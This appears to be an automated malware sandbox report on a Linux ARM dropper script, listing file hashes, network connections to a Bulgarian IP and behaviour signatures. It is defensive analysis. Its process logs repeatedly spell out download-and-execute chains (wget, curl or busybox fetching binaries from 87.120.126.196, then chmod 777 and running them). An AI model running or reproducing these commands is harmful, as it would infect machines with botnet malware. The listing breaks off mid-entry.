[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/chmod
[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/rm
[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/wget
[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/chmod
[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/rm
[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/wget
[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/chmod
[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/rm
[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| US | 151.101.129.91:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.129.91:443 | tcp | |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 84.17.50.8:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| GB | 84.17.50.8:443 | 1527653184.rsc.cdn77.org | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-25 01:27
Reported
2024-10-25 01:31
Platform
debian9-armhf-20240611-en
Max time kernel
20s
Max time network
57s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | N/A |
| N/A | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | N/A |
| N/A | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | N/A |
| N/A | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | N/A |
| N/A | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | N/A |
| N/A | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | N/A |
| N/A | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | N/A |
| N/A | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | N/A |
| N/A | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | N/A |
| N/A | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | N/A |
| N/A | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | N/A |
| N/A | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | N/A |
| N/A | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | N/A |
| N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | N/A |
| N/A | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK | /usr/bin/curl | N/A |
Processes
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/chmod
[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/bin/rm
[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]
/usr/bin/wget
[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/chmod
[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/bin/rm
[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]
/usr/bin/wget
[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/chmod
[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/bin/rm
[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]
/usr/bin/wget
[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/chmod
[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/bin/rm
[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]
/usr/bin/wget
[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/chmod
[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/bin/rm
[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]
/usr/bin/wget
[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/chmod
[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/bin/rm
[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]
/usr/bin/wget
[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/chmod
[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/bin/rm
[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]
/usr/bin/wget
[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/chmod
[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/bin/rm
[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]
/usr/bin/wget
[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/chmod
[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/bin/rm
[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]
/usr/bin/wget
[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/chmod
[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/bin/rm
[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]
/usr/bin/wget
[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/chmod
[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/bin/rm
[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]
/usr/bin/wget
[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/chmod
[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/bin/rm
[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]
/usr/bin/wget
[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/chmod
[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/bin/rm
[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/chmod
[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/rm
[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/chmod
[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/bin/rm
[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]
/usr/bin/wget
[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]
/usr/bin/curl
